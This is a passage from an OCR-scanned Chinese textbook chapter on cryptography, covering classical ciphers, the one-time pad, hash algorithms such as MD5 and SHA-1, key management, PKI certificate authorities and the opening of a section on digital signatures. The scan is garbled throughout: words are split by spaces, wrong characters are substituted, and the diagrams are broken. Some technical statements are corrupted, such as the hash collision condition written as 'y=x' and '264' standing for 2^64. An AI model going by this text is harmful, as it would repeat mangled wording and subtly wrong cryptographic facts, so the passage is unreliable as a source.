来 发 送 消 息 ， 一 般 只 能 用 于 传送 一 组 预先 约定 的 消息 。 


2. 替换 加 密 
替换 加 密 是 指 用 一 组 密 文字 母 来 代 蔡 一 组 明文 字母 以 隐藏 明文 ， 同 时 保持 明文 字母 的 
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顺序 不 变 的 替换 方式 。 

将 明文 字母 表 M 中 的 每 个 字母 蔡 换 成 密 文 字母 表 C 中 的 字母 。 这 一 类 密码 包括 移 位 
密码 、 蔡 换 密码 、 仿 射 密码 、 乘 数 密 码 、 多 项 式 代替 密码 、 密 钥 短语 密码 等 。 这 种 方法 可 
以 用 来 传送 任何 信息 ， 但 安全 性 不 及 代码 加 密 。 

例如 ， 下 面 的 这 组 字母 对 应 关系 就 构成 了 一 个 替换 加 密 器 : 

明文 字母 : A B C D E F.. 

密 文字 母 : K U P S W B... 

因为 每 一 种 语言 都 有 其 特定 的 统计 规律 ， 如 英文 字母 中 各 字母 出 现 的 频 度 相对 基本 固 
， 根 据 这 些 规律 可 以 很 容易 地 对 蔡 换 加 密 进行 破解 。 一 种 最 古老 的 替换 加 密 是 恺 撤 密 
， 又 称 为 循环 移 位 密码 。 


3. 变 位 加 密 


变 位 加 密 不 隐藏 明文 的 字符 ， 即 明文 的 字母 保持 相同 ， 但 其 顺序 被 打 乱 重新 排列 成 另 
一 种 不 同 的 格式 。 常 用 的 变 位 加 密 有 简单 变 位 加 密 、 列 变 位 加 密 和 和 拢 阵 变 位 加 密 。 

(1) 简单 变 位 加 密 。 预 先 约定 好 一 组 数字 表示 密 钥 ， 将 文字 依次 写 在 密 钥 下 ， 再 按 数 
字 次 序 重 新 组 织 文字 实现 加 密 ， 也 有 人 喜欢 将 明文 逆序 输出 作为 密 文 。 

例如 : 

密 钥 : 6835490271 

明文 :小 赵 拿 走 黑 皮 包 交 给 李 

密 文 : 包 李 交 拿 黑 走 小 给 赵 皮 

(2) 列 变 位 加 密 。 将 明文 字符 分 割 成 个 数 固定 的 分 组 ， 如 5 个 一 组 ，5 即 为 密 钥 ， 按 
一 组 一 行 的 次 序 整齐 排列 ， 最 后 如 果 不 足 一 组 可 以 用 任意 字符 填充 ， 完 成 后 按 列 读 取 即 成 
密 文 。 

(3) 矩阵 变 位 加 密 。 将 明文 中 的 字母 按 给 定 的 顺序 安排 在 一 个 矩阵 中 ， 然 后 用 另 一 种 
顺序 选 出 矩阵 的 字母 来 产生 密 文 ， 一 般 为 按 列 变换 次 序 。 


4. 一 次 性 加 密 


一 次 性 加 密 也 称 一 次 性 密码 夭 加 密 。 如 果 要 既 保持 代码 加 密 的 可 靠 性 ， 又 保持 替换 加 
密 器 的 灵活 性 ， 可 以 采用 一 次 性 密码 进行 加 密 。 

密码 敌 每 一 页 都 是 不 同 的 代码 表 ， 可 用 一 页 上 的 代码 来 加 密 一 些 词 ， 用 后 销毁 ;再 用 
另 一 页 加 密 另 一 些 词 ， 直 到 全 部 的 明文 完成 加 密 。 一 次 性 加 密 破译 的 唯一 方法 就 是 获取 一 
份 相同 的 密码 敌 。 

计算 机 出 现 以 后 ， 密 码 敌 就 无 需 使 用 纸张 ， 而 是 使 用 计算 机 和 一 系列 数字 来 制作 。 加 
密 时 ， 根 据 密码 德里 的 数字 对 报 文中 的 字母 进行 移 位 操作 或 按 位 进行 异 或 计算 ， 以 加 密 报 
文 。 解密 时 ， 接 收 方 需要 根据 持 有 的 密码 夭 ， 将 密 文 的 字母 反 向 移 位 ， 或 再 次 作 异 或 计 
算 ， 以 得 出 明文 。 

例如 : 

加 密 过 程 中 明文 与 密码 按 位 异 或 计算 ， 求 出 密 文 : 

明文 : 101101011011 


型 了 
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密码 : 011010101001 

密 文 : 110111110010 

解密 过 程 中 密 文 与 密码 按 位 异 或 计算 ， 求 出 明文 : 

密 文 : 110111110010 

密码 : 011010101001 

明文 : 101101011011 

为 了 保证 信息 加 密 的 安全 性 ， 一 次 性 密码 短 只 能 使 用 一 次 。 在 这 里 ，“ 一 次 性 ”有 两 
个 含义 : 包 密 码 短 不 能 重复 用 来 加 密 不 同 的 报 文 ，@ 密 码 短 至少 不 小 于 明文 长 度 ， 即 不 得 
重复 用 来 加 密 明文 的 不 同 部 分 。 

一 次 性 加 密 的 安全 性 可 以 这 样 来 理解 : 由 于 密码 短 只 使 用 一 次 ， 它 把 长 度 相 同 的 所 有 
明文 都 一 一 映射 到 长 度 相 同 的 报 文集 合 上 。 如 果 没 有 正确 的 密码 短 ， 密 文 可 以 被 各 种 猜测 
来 的 密码 短 逆 映射 成 任何 有 意义 或 无 意义 的 文字 。 窍 取 者 是 无 法 通过 这 种 方法 知道 究竟 哪 
一 种 映射 得 到 的 是 真正 的 原文 的 。 

一 次 性 加 密 在 使 用 中 也 存在 许多 问题 : 

@ ”一 次 性 密码 秒 是 靠 密码 只 使 用 一 次 来 保障 的 。 如 果 密 码 使 用 了 多 次 ， 密 文 就 会 呈 

现 出 某 种 规律 性 ， 也 就 有 被 破译 的 可 能 。 
e ”由 于 密 钥 无 法 记忆 ， 需 要 收发 双方 随身 携带 ， 非 常 不 方便 。 
e@ ” 密 钥 不 可 重复 ， 所 以 可 传送 的 数据 总 量 受 到 密 钥 数量 的 限制 。 


3.3.2” 非 对 称 加 密 及 单 向 加 密 
1. 非 对 称 加 密 


非 对 称 密 钥 加 解密 过 程 使 用 相互 关联 的 一 对 密 钥 ， 一 个 归 发 送 者 ， 一 个 归 接 收 者 。 密 
钥 对 中 的 一 个 必须 保持 保密 状态 ， 称 为 私 钥 ， 另 一 个 则 可 以 公开 发 布 ， 称 为 公 钥 。 这 组 密 
钥 中 一 个 用 于 加 密 ， 一 个 用 于 解密 。 


2. 单 向 加 密 


单 向 加 密 也 称 为 哈 希 HASH 加 密 (Hash Encryption)， 利 用 一 个 含有 HASH 函数 的 哈 希 
表 ， 确 定 用 于 加 密 的 十 六 位 进 制 数 。 

HASH 函数 也 称 为 散 列 函数 ， 对 不 同 长 度 的 输入 信息 ， 能 够 产生 固定 长 度 的 输出 。 这 
种 固定 长 度 的 输出 称 为 原 输入 信息 的 散 列 或 消息 摘要 。 散 列 是 信息 的 提炼 ， 通 常 其 长 度 比 
原始 信息 小 很 多 ， 且 为 一 个 固定 长 度 。 加 密 性 强 的 散 列 一 定 是 不 可 逆 的 ， 也 就 是 说 通过 散 
列 结果 ， 无 法 推出 任何 部 分 的 原始 信息 。 同 时 也 无 法 找 出 具有 相同 散 列 结果 的 两 条 信息 。 

1)” 散 列 算法 的 基本 原理 

散 列 算法 是 用 来 产生 一 些 数据 片段 (消息 或 会 话 项 ) 的 散 列 值 的 算法 。 散 列 算法 具有 在 
输入 数据 中 的 细微 更 改 都 可 以 改变 散 列 值 中 每 个 比特 的 特性 ， 因 此 ， 散 列 对 于 检测 诸如 消 
息 或 者 密 钥 等 信息 对 象 中 的 任何 微小 变化 很 有 用 。 

一 个 安全 的 散 列 函数 瑟 必须 具有 下 列 属性 : 

e@ ”了 H 能 够 应 用 到 大 小 不 一 的 数据 上 。 
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开 能 够 生成 大 小 固定 的 输出 。 

对 于 任意 给 定 的 x，H(x) 的 计算 相对 简单 。 

对 于 任意 给 定 的 代码 h， 要 发 现 满足 H(x)=h 的 x 在 计算 上 是 不 可 行 的 。 
对 于 任意 给 定 的 块 h， 要 发 现 满足 H(y)= H(x) 而 y=x 在 计算 上 是 不 可 行 的 。 
要 发 现 满足 H(x)= H(y) 的 (x，y) 对 ， 在 计算 上 是 不 可 行 的 。 

2) 目前 常见 的 散 列 算法 

MD2 算法 : MD2 算法 是 麻 省 理工 学 院 Ronald Rivest 于 1989 年 开发 出 来 的 ， 在 处 理 
过 程 中 首先 对 信息 进行 补 位 ， 使 得 信息 的 长 度 为 16 的 整数 倍 ， 然 后 以 一 个 16 位 的 检验 和 
追加 到 信息 末尾 。 并 且 根 据 这 个 新 产生 的 信息 计算 出 散 列 值 。 后 来 ，Rogier 和 Chauvaud 
发 现 如 果 忽 略 了 检验 将 和 MD2 产生 冲突 。MD2 算法 加 密 后 结果 是 唯一 的 。 

MD4 算法 : MD4 算法 是 由 Ronald Rivest 于 1990 年 开发 出 来 的 。 它 是 可 以 用 来 测试 
信息 的 完整 性 。 其 摘要 长 度 为 128 位 。 这 个 算法 影响 了 后 来 的 算法 如 MD5、SHA 家 族 和 
RIPEMD 等 。 

MD5 算法 : MD5 算法 是 由 Ronald Rivest 于 1992 年 开发 出 来 的 。MDS5 以 512 位 分 组 
来 处 理 输入 的 信息 ， 且 每 一 分 组 又 被 划分 为 16 个 32 位 子 分 组 ， 经 过 了 一 系列 的 处 理 后 
算法 的 输出 由 4 个 32 位 分 组 组 成 ， 将 这 4 个 32 位 分 组 级 联 后 将 生成 一 个 128 位 散 列 值 。 

SHA/SHA-1 算法 : SHA 算法 由 美国 国家 标准 和 技术 协会 (National Institute of 
Standards and Technology，NIST) 于 1993 年 提出 ， 并 被 定义 为 安全 散 列 标准 (Secure Hash 
Standard，SHS)。SHA-1 是 1994 年 修订 的 版 本 ， 其 对 长 度 不 超过 264 二 进 制 位 的 消息 产 
生 160 位 的 消息 摘要 输出 ， 按 512 比特 块 处 理 其 输入 。SHA 算法 的 缺点 是 速度 比 MD5 
慢 ， 但 是 SHA 的 报 文摘 要 更 长 ， 更 有 利于 对 抗 野蛮 的 攻击 。 


3.4” 密 钥 管 理 和 数字 证 书 


对 文件 进行 加 密 只 能 解决 传送 信息 的 保密 问题 ， 而 防止 他 人 对 传输 信息 进行 破坏 ， 以 
及 确定 发 信人 的 身份 ， 还 需要 其 他 的 手段 。 密 码 技术 除了 提供 信息 的 加 密 和 解密 外 ， 还 需 
要 对 信息 的 来 源 、 信 息 的 完整 性 和 不 可 否定 性 进行 保证 。 


3.4.1 密 钥 管理 


密 钥 管理 是 安全 密码 系统 的 重要 环节 。 数 据 加 密 、 验 证 和 签名 都 需要 管理 大 量 的 密 
钥 ， 而 这 些 密 钥 又 要 经 过 加 密 ， 再 以 密 文 的 形式 发 送 给 合法 用 户 。 密 钥 的 管理 任务 就 是 给 
通信 双方 提供 密码 运算 所 需要 的 密 钥 ， 在 密 钥 的 整个 生命 周期 内 要 对 密 钥 的 使 用 进行 严格 
的 控制 ， 直 至 销毁 失效 为 止 。 

密 钥 管理 是 一 项 综合 性 的 技术 ， 它 包括 密 钥 的 生成 、 分 发 、 存 储 、 销 毁 、 使 用 等 一 系 
列 过 程 。 

1) ” 密 钥 生成 

密 钥 生成 是 指 安全 地 生成 以 后 要 使 用 的 密 钥 或 密 钥 对 ( 公 钥 密码 系统 ) 的 过 程 。 密 钥 只 
能 在 管理 密 钥 系统 设施 内 产生 。 密 钥 管 理 设备 具有 访问 控制 功能 ， 是 一 种 包含 密码 模块 并 
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且 受 保护 的 密码 设备 。 密 钥 空 间 中 的 每 一 个 密 钥 的 出 现 概率 都 应 该 相同 ， 与 其 前 导 和 后 继 
出 现 的 密 钥 都 无 相关 性 ， 并 且 具 有 不 可 预见 性 。 密 钥 生 成 后 ， 必 须 经 过 检测 ， 只 有 符合 规 
定 的 满足 随机 性 检验 标准 的 数据 才能 作为 密 钥 使 用 。 密 钥 的 产生 主要 利用 噪声 源 技术 ， 该 
技术 就 是 产生 二 进 制 的 随机 序列 或 与 之 对 应 的 随机 数 ， 其 主要 理论 基础 是 混沌 理论 。 另 外 
使 用 随机 系列 发 生 器 可 以 自动 地 产生 大 量 随 机 的 密 钥 。 

2) ” 密 钥 的 保护 和 分 发 

采用 对 称 加 密 算法 进行 保密 通信 ， 需 要 共享 同一 密 钥 。 通 常 是 系统 中 的 一 个 成 员 先 选 
择 一 个 秘密 密 铀 ， 然 后 将 它 传送 另 一 个 成 员 或 别 的 成 员 。 在 X9.17 标准 中 ， 描 述 了 密 钥 加 
密 密 钥 和 数据 密 钥 两 种 。 其 中 密 钥 加 密 密 钥 用 于 加 密 其 他 需要 分 发 的 密 钥 ， 而 数据 密 钥 只 
对 信息 流 进行 加 密 。 

密 钥 加 密 密 钥 一 般 通 过 手工 分 发 。 为 增强 保密 性 ， 也 可 以 将 密 钥 分 成 许多 不 同 的 部 分 
然后 用 不 同 的 信道 发 送出 去 。 对 于 大 型 网 络 来 说 ， 每 对 用 户 必 须 交 换 密 铀 ，n 个 人 的 网 络 
总 的 交换 次 数 为 nn-1)/2， 在 这 种 情况 下 ， 通 常 需要 建造 一 个 密 钥 分 发 中 心 来 负责 密 钥 的 
管理 。 

通过 邮递 或 信使 护送 密 铀 ， 其 安全 性 取决 于 信使 ， 因 为 信使 有 被 收买 的 可 能 ， 并 且 这 
种 方法 的 传输 量 和 存储 量 都 很 大 。 人 们 希望 能 设计 出 满足 以 下 两 个 条 件 的 协议 : 一 是 传输 
量 和 存储 量 都 比较 小 ， 二 是 每 一 对 用 户 都 能 独立 地 计算 一 个 秘密 密 钥 。Diffie-Hellman 密 
钥 交 换 协议 就 是 满足 上 述 两 个 条 件 的 密 钥 分 配 协议 ， 它 通过 两 个 或 多 个 成 员 在 一 个 公开 的 
信道 上 通信 联络 建立 一 个 秘密 密 钥 。 

3) ”验证 密 钥 

密 钥 附着 一 些 检 错 和 纠 错位 来 传输 ， 当 密 钥 在 传输 中 发 生 错误 时 ， 能 很 容易 地 被 检查 
出 来 ， 并 且 如 果 需 要 ， 密 钥 可 被 重 传 。 接 收 端 也 可 以 对 接收 的 密 钥 的 正确 性 进行 验证 。 发 
送 方 用 密 钥 加 密 一 个 常量 ， 然 后 把 密 文 的 前 2 一 4 字 节 与 密 钥 一 起 发 送 给 接收 方 。 在 接收 
端 ， 做 同样 的 工作 ， 如 果 接 收 端 加 密 后 的 常数 能 与 发 送 端 常数 匹配 ， 则 传输 是 正确 的 。 

4) ”更 新 密 钥 

当 密 钥 需要 频繁 改变 时 ， 频 繁 进行 新 的 密 钥 分 发 的 确 是 一 件 困难 的 事情 ， 一 种 更 容易 
的 解决 办 法 是 从 旧 的 密 钥 中 产生 新 的 密 铀 ， 有 时 称 为 密 钥 更 新 。 密 钥 更 新 可 以 使 用 单 向 函 
数 进行 。 如 果 双 方 共享 同一 密 钥 ， 并 用 同一 个 单 向 函数 进行 操作 ， 就 会 得 到 相同 的 结果 。 

5) ”存储 密 钥 

密 钥 的 存储 不 同 于 一 般 数 据 的 存储 ， 需 要 对 其 进行 保密 存储 。 保 密 方法 一 般 有 两 种 : 
一 种 是 基于 密 钥 的 软 保护 ， 另 一 种 是 基于 硬件 的 物理 保护 。 前 者 使 用 加 密 算法 对 用 户 密 钥 
(包括 口令 ) 加 密 ， 然 后 密 钥 以 密 文 形式 存储 。 后 者 将 密 钥 存储 于 与 计算 机 相 分 离 的 某 种 物 
理 介质 中 ， 以 实现 密 钥 的 物理 隔离 保护 。 

6) 备份 密 钥 

密 钥 的 备份 可 以 采用 密 钥 托管 、 秘 密 分 割 、 秘 密 共享 等 方式 。 密 钥 备 份 的 最 简单 方法 
是 使 用 密 钥 托管 中 心 。 密 钥 托管 要 求 所 有 用 户 将 自己 的 密 钥 交 给 密 钥 托管 中 心 ， 由 密 钥 托 
管 中 心 负责 备份 保管 密 钥 (如 锁 在 某 个 地 方 的 保险 柜 里 或 用 主 密 钥 对 它们 进行 加 密 保 存 )， 
一 旦 用 户 的 密 钥 丢失 (如 用 户 遗 忘 了 密 钥 或 用 户 意外 死亡 )， 按 照 一 定 的 规章 制度 ， 可 从 密 
钥 托 管 中 心 索取 该 用 户 的 密 钥 。 
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7) ” 密 钥 有 效 期 
密 钥 的 使 用 应 该 有 一 定 的 有 效 期 ， 不 可 以 无 限期 使 用 。 这 是 因为 : 密 钥 使 用 时 间 越 
长 ， 它 泄露 的 机 会 就 越 大 ， 如果 密 钥 已 泄露 ， 那 么 密 钥 使 用 得 时 间 越 入， 造成 的 损失 就 越 
大 ; 密 钥 使 用 越久 ， 人 们 花费 精力 破译 它 的 诱惑 力 就 越 大 。 
不 同类 型 的 密 钥 应 该 具有 不 同 的 有 效 期 : 
@ ”数据 密 钥 的 有 效 期 主要 由 数据 的 价值 和 给 定时 间 里 加 密 数 据 的 数量 决定 。 价 值 与 
数据 传送 率 越 大 ， 所 用 的 密 钥 更 换 应 该 越 频繁 。 
e ” 密 钥 加 密 密 钥 无 需 频 繁 更 换 ， 因 为 它们 只 是 偶尔 地 用 作 密 钥 交 换 。 在 某 些 应 用 
中 ， 密 钥 加 密 密 钥 仅 需要 一 个 月 或 一 年 更 换 一 次 。 
@ ”用 来 加 密 保存 数据 文件 的 加 密 密 钥 不 能 经 常 地 变换 。 通 常 是 每 个 文件 用 唯一 的 密 
钥 加 密 ， 然 后 再 用 密 钥 加 密 密 钥 把 所 有 密 钥 加 密 ， 密 钥 加 密 密 钥 要 么 被 记忆 下 
来 ， 要 么 保存 在 一 个 安全 地 点 。 
e ”公开 密 钥 密码 应 用 中 的 私 钥 的 有 效 期 是 根据 应 用 的 不 同 而 变化 的 。 用 作 数 字 签名 
和 身份 识别 的 私 钥 有 效 期 必须 持续 数 年 (甚至 终身 )。 即 使 期 望 密 钥 的 安全 性 持续 
终身 ， 两 年 更 换 一 次 密 钥 也 是 要 考虑 的 。 
8) ”销毁 密 钥 
如 果 密 钥 必须 替换 ， 旧 的 密 钥 就 必须 物理 地 销毁 。 


3.4.2 ” 公 钥 基础 设施 (PKI) 


随 着 网 络 技术 和 信息 技术 的 发 展 ， 电 子 商务 已 逐步 被 人 们 所 接受 。 但 通过 网 上 进行 电 
子 商务 交易 时 ， 由 于 交易 双方 并 不 在 现场 ， 因 此 ， 无 法 确认 双方 的 合法 身份 ， 同 时 交易 信 
息 是 交易 双方 的 商业 秘密 ， 在 网 上 传输 时 必须 保证 安全 性 ， 防 止 信息 被 窃取 。 因 此 ， 在 电 
子 商 务 中 ， 必 须 从 技术 上 保证 交易 过 程 中 能 够 实现 身份 认证 、 安 全 传输 、 不 可 和 否认 性 、 数 
据 完整 性 。 


1. PKI 概述 


公 钥 基础 设施 (PKI，Public Key Infrastructure) 是 指 利用 公 钥 理论 和 技术 建立 的 提供 信 
息 安 全 服务 的 基础 设施 。PKI 采用 证 书 的 方式 进行 公 钥 管 理 ， 通 过 第 三 方 的 可 信 机 构 ( 认 
证 中 心 CA) 把 用 户 的 公 钥 和 用 户 的 其 他 标识 信息 捆绑 一 起 ， 其 中 包含 用 户 名 和 电子 邮件 地 
址 等 信息 ， 用 来 在 因特网 上 验证 用 户 的 身份 。PKI 把 公 钥 密码 和 对 称 密码 结合 起 来 ， 在 因 
特 网 上 实现 密 钥 的 自动 管理 ， 保 证 网 上 数据 的 传输 安全 。 

PKI 的 主要 目的 是 通过 自动 管理 密 钥 和 证 书 ， 为 用 户 建立 一 个 安全 的 网 络 运 行 环境 ， 
使 用 户 可 以 在 多 种 应 用 环境 下 方便 地 使 用 加 密 和 数字 签名 技术 ， 从 而 保证 网 上 数据 的 机 密 
性 、 有 效 性 和 完整 性 。 

PKI 作为 安全 基础 设施 ， 能 为 不 同 的 用 户 按 不 同安 全 需求 提供 多 种 安全 服务 。 这 些 服 
务 包括 : 认证 服务 、 数 据 完 整 性 服务 、 数 据 保密 性 服务 、 安 全 时 间 戳 、 不 可 否认 性 服 
务 等 。 
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2. PKI 体系 结构 


一 个 完整 的 PKI 系统 包含 认证 机 构 (CA)、 注 册 机 构 (RA)、 证 书 管理 系统 、PKI 策略 管 
理 和 PKI 应 用 接口 等 几 部 分 。PKI 体系 结构 如 图 3-13 所 示 。 


PKI 其 他 应 用 | 


I 


用 户 注册 中 心 RA 


| 证 书 发 布 中 心 


We 


图 3-13 ”PKI 体系 结构 图 

1) ”认证 机 构 (CA) 

认证 机 构 (CA，Certificate Authority)， 证 书 授权 中 心 ， 也 称 认 证 中 心 。CA 是 PKI 体 
系 的 核心 ， 是 负责 发 放 和 管理 数字 证 书 的 具有 权威 性 和 公正 性 的 第 三 方 信任 机 构 。CA 的 
作用 是 检查 证 书 持 有 者 的 合法 身份 ， 并 签发 证 书 ， 以 防止 证 书 被 伪造 或 算 改 ， 以 及 对 密 钥 
和 证 书 进行 管理 。 

在 一 个 大 型 的 应 用 环境 中 ， 认 证 中 心 采 用 多 层次 的 分 级 机 构 ， 各 级 认证 中 心 类 似 于 各 
级 行政 机 关 ， 上 级 认证 中 心 负责 签发 和 管理 下 级 认证 中 心 的 证 书 ， 最 下 一 级 的 认证 中 心 直 
接 面 对 最 终 用 户 。CA 认证 中 心 层次 结构 示意 图 如 图 3-14 所 示 。 


| 二 级 CA 中 心 | | 二 级 CA 中 心 | 
| | | 
| 三 级 CA 中 心 | 三 级 CA 中 心 | | 三 级 CA 中 心 三 级 CA 中 心 
| 
持 卡 人 CA 中 心 | 商家 CA 中 心 | | 网 关 CA 中 心 
| | 
持 卡 人 证 书 | 商家 证 书 | | 支付 网 关 证 书 


图 3-14 CA 认证 中 心 层次 结构 示意 图 
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在 实际 的 CA 认证 环境 中 不 可 能 只 有 一 个 CA 中 心 ， 多 个 CA 中 心 之 间 必 然 存 在 一 个 
信任 关系 模型 。 信 任 关系 模型 建立 的 目的 是 确保 一 个 认证 机 构 颁发 的 证 书 ， 能 够 被 其 他 认 
证 机 构 的 用 户 所 信任 。 信 任 关 系 模型 有 : 严格 层次 信任 模型 、 分 布 式 信任 模型 、 以 用 户 为 
中 心 的 信任 模型 和 交叉 认证 模型 等 。 

CA 认证 中 心 的 功能 有 以 下 几 个 方面 。 

(1) 证 书 的 颁发 

认证 中 心 负责 接收 、 验 证 用 户 ( 包 括 下 级 认证 中 心 和 最 终 用 户 ) 的 数字 证 书 申请 ， 同 时 
将 申请 的 内 容 进行 备案 ， 并 根据 申请 的 内 容 确定 是 否 受理 该 数字 证 书 申请 。 如 果 认 证 中 心 
接受 该 数字 证 书 申请 ， 则 进一步 确定 给 用 户 颁 发 何 种 类 型 的 证 书 。 新 证 书 用 认证 中 心 的 私 
钥 签 名 以 后 ， 发 送 到 目录 服务 器 供用 户 下 载 和 查询 。 为 了 保证 消息 的 完整 性 ， 返 回 给 用 户 
的 所 有 应 答 信息 都 要 使 用 认证 中 心 的 签名 。 

(2) 证 书 的 更 新 

认证 中 心 可 以 定期 更 新 所 有 用 户 的 证 书 ， 或 者 根据 用 户 的 请 求 来 更 新 用 户 的 证 书 。 

(3) 证 书 的 查询 

证 书 的 查询 功能 分 为 两 类 ， 一 类 是 证 书 申请 的 查询 ， 认 证 中 心 根据 用 户 的 查询 请 求 返 
回 当前 用 户 证 书 申请 的 处 理 过 程 ， 另 一 类 是 用 户 证 书 的 查询 ， 这 类 查询 由 目录 服务 器 来 完 
成 ， 目 录 服 务 器 根据 用 户 的 请 求 返 回 适 当 的 证 书 。 

(4) 证 书 的 作废 

当 用 户 的 私 钥 由 于 泄密 等 原因 造成 用 户 证 书 需要 申请 作废 时 ， 用 户 需 要 向 认证 中 心 提 
出 证 书 作 废 的 请 求 ， 认 证 中 心 根据 用 户 的 请 求 确定 是 否 将 该 证 书 作 废 。 另 外 一 种 证 书 作废 
的 情况 是 证 书 已 经 过 了 有 效 期 ， 认 证 中 心 将 自动 把 证 书 作 废 。 证 书 的 作废 功能 由 认证 中 心 
通过 维护 证 书 作废 列表 (CRL，Certificate Revocation List) 来 完成 。 

(5) 证 书 的 归档 

证 书 都 具有 一 定 的 有 效 期 ， 证 书 过 了 有 效 期 之 后 就 应 该 作废 。 因 为 有 时 可 能 需要 验证 
以 前 的 某 个 交易 过 程 中 产生 的 数字 签名 ， 因 此 作废 的 证 书 不 能 简单 地 丢弃 。 基 于 此 类 考 
虑 ， 认 证 中 心 还 应 当 具 备 作废 证 书 和 作废 私 钥 的 管理 功能 。 

2) ”注册 机 构 (RA) 

注册 机 构 (RA，Registration Authority)， 提 供用 户 和 CA 之 间 的 一 个 接口 ， 相 当 于 CA 
的 一 个 代理 机 构 ， 是 CA 证 书 发 放 和 管理 的 扩展 。 

RA 的 主要 功能 是 负责 收集 用 户 信 息 和 确认 用 户 身 份 ， 接 受用 户 的 注册 申请 ， 审 查 用 
户 的 申请 资格 。 当 获得 RA 许可 后 ， 由 RA 生成 此 用 户 的 标识 符 ， 提 供给 CA 生成 唯一 标 
识 此 用 户 的 数字 证 书 。 因 此 RA 认证 的 准确 性 是 CA 颁发 证 书 的 基础 。 总 的 来 说 ， 认 证 中 
心 是 面向 各 注册 中 心 的 ， 而 注册 机 构 是 面向 最 终 用 户 的 ， 注 册 机 构 是 用 户 与 认证 中 心 的 中 
间 渠 道 。 

3) ”证 书 管理 系统 

证 书 管理 系统 负责 证 书 的 发 布 管理 、 证 书 的 撤销 管理 等 。 通 过 使 用 LDAP(Lightweigth 
Directory Access Protocol) 目 录 服 务 来 实现 对 证 书库 的 管理 。CA 颁发 和 撤销 的 证 书 都 集中 
存放 在 证 书库 中 ， 证 书库 是 网 上 的 一 种 公共 信息 库 ， 公 众 可 以 进行 开放 式 查询 ， 用 户 可 以 
实时 查询 证 书 和 证 书 撤销 信息 。 目 录 系统 必须 确保 证 书库 的 完整 性 ， 防 止 伪造 和 算 改 


第 3 章 ”密码 和 加 密 技 术 95 


证 汀 。 

4) ”策略 管理 

策略 管理 定义 和 建立 了 一 个 组 织 信息 安全 方面 的 指导 方针 ， 同 时 也 定义 了 密码 系统 使 
用 的 处 理 方法 和 原则 。 管 理 员 根据 实际 应 用 的 需要 ， 为 不 同 的 用 户 选 择 不 同 的 安全 策略 。 
这 些 安全 策略 必须 适应 不 同 的 需求 且 容 易 实现 。 

5) ”PKI 应 用 接口 

PKI 应 用 接口 为 用 户 提 供 方便 、 快 捷 、 安 全 的 方式 与 PKI 交互 ， 使 用 户 能 够 有 效 地 使 
用 加 密 、 数 字 签 名 等 服务 ， 同 时 需要 确保 建立 起 的 网 络 环境 的 安全 可 信和 完整 。 

一 个 完备 的 PKI 还 需要 具备 密 钥 备份 及 恢复 系统 ， 解 决 因 密 钥 丢 失 ， 密 文 无 法 解密 造 
成 的 数据 丢失 问题 。 为 了 避免 这 种 情况 出 现 ，PKI 应 该 提供 密 钥 备份 与 恢复 机 制 ， 设 计 和 
实现 健全 的 密 钥 管理 方案 ， 保 证 安全 的 密 钥 备份 、 更 新 和 恢复 ， 这 也 是 关系 到 整个 PKI 系 
统 强 健 性 、 安 全 性 和 可 用 性 的 重要 因素 。 


3. PKI 的 基本 功能 


PKI 的 主要 功能 是 对 密 钥 和 公 钥 证 书 进行 管理 。 具 体 地 讲 ， 一 个 PKI 系统 应 该 具有 下 
面 的 功能 。 

1) ”证 书生 成 

CA 负责 证 书 的 签发 工作 ， 所 以 CA 需要 对 证 书 申请 者 的 身份 进行 验证 ， 并 且 CA 在 
签发 证 书 时 附 有 时 间 标 志 ， 表 明证 书 的 有 效 期 。CA 可 以 把 证 书 发 给 申请 者 ， 也 可 以 将 证 
书 发 到 证 书 发 布 中 心 。 

2) ”证 书 注销 

证 书 可 能 由 于 超出 有 效 期 而 变 得 无 效 ， 或 者 用 户 密 钥 泄 露 、 或 者 证 书 持 有 者 信息 改变 
等 原因 ， 这 时 需要 注销 证 书 ，CA 可 以 通过 CRL 将 作废 的 证 书 进行 发 布 。 

3) ”存储 和 检索 证 书 与 CRL 

CA 发 布 的 证 书 以 及 作废 证 书 CRL 应 该 能 够 方便 、 快 捷 的 被 使 用 者 查找 和 使 用 ， 最 常 
用 的 存储 和 检索 方式 是 通过 目录 服务 、HTTP 和 E-mail。 

4) ”提供 信任 

用 户 的 主要 信任 来 源 于 对 证 书 的 验证 ， 这 种 信任 主要 是 基于 对 颁发 证 书 的 CA 信任 。 
而 对 于 不 同 管理 领域 的 证 书 的 信任 还 要 依靠 证 书 链 或 直接 交叉 认证 来 实现 。 

5) ”证 书 链 处 理 

用 户 由 CA 颁发 证 书 ， 而 CA 又 由 高 一 级 CA 颁发 证 书 ， 如 此 归结 到 根 节点 CA。 如 
果 用 户 需 要 验证 一 份 证 书 ， 他 需要 先 判 断 证 书 是 否 在 有 效 期 ， 还 要 判别 签发 证 书 的 CA 是 
否 被 信任 ， 如 不 被 信任 ， 则 查询 签发 此 CA 证 书 的 CA 是 否 被 信任 。 如 此 直到 找到 被 信任 
的 CA， 如 果 找 不 到 被 信任 的 CA， 则 此 证 书 被 认为 不 可 信 。 

6) ”交叉 认证 

一 个 CA 可 以 为 另 一 个 CA 签发 证 书 ， 这 样 可 以 使 得 后 者 签发 的 证 书 能 为 第 一 个 CA 
所 认可 。 

7) ”时 间 截 

在 交易 中 ， 除 了 交易 内 容 的 真实 性 外 ， 时 间 是 一 个 重要 的 元 素 。PKI 系统 中 数字 证 书 
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的 时 效 性 也 表明 时 间 服 务 功能 是 PKI 必须 具备 的 功能 之 一 。 

8) ” 密 钥 管 理 

密 钥 管 理 是 PKI 的 重要 功能 之 一 。PKI 响应 当前 的 用 户 请 求 来 产生 证 书 或 CRL， 密 
钥 生 成 、 撤 销 、 恢 复 、 更 新 、 归 档 以 及 密 钥 的 备份 都 是 CA 的 日 常 业务 工作 。 


3.4.3 ”数字 签名 


数字 签名 (Digital Signature) 可 以 解决 手写 签名 中 的 签字 人 否认 签字 或 其 他 人 伪造 签字 
等 问题 。 被 广泛 应 用 在 银行 的 信用 卡 系统 、 电 子 商务 系统 、 电 子 邮件 等 系统 中 。 


1. 数字 签名 概述 


数字 签名 又 称 公 钥 数 字 签名 、 电 子 签 章 ， 是 指 以 电子 形式 存在 于 数据 信息 之 中 的 ， 或 
作为 其 附件 的 或 逻辑 上 与 之 有 联系 的 数据 ， 可 用 于 辨别 数据 签署 人 的 身份 ， 并 表明 签署 人 
对 数据 信息 中 包含 的 信息 的 认可 。 

数字 签名 在 ISO 7498-2 标准 中 的 定义 为 : 附加 在 数据 单元 上 的 一 些 数据 ， 或 是 对 数 
